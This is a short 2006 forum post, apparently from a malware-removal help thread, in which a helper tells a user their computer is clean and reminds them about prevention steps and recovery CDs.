
Posted 22 January 2006 - 09:08 AM

Now that you are clean, please follow these simple steps in order to keep your computer clean and secure:

How did I get infected ? With steps so it does not happen again !

Glad I was able to help.
Everyday is virus day. Do you know where your recovery CDs are ?
Did you create them yet ?

Posted Image




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users